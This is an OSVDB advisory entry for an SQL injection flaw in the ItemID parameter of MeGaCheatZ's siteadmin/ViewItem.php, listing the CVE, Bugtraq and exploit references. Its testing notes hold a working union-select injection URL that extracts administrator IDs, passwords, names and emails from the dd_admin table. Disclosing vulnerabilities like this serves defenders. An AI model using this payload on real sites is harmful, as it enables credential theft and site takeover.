MeGaCheatZ siteadmin/ViewItem.php ItemID Variable SQL Injection

2007-12-19T00:00:00
ID OSVDB:40026
Type osvdb
Reporter OSVDB
Modified 2007-12-19T00:00:00

Description

Manual Testing Notes

http://[target]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*

References:

Related OSVDB ID: 1020366 Related OSVDB ID: 1020367 Other Advisory URL: http://www.inj3ct-it.org/exploit/megacheatz.1.1.txt Generic Exploit URL: http://www.milw0rm.com/exploits/4778 CVE-2007-6557 Bugtraq ID: 26999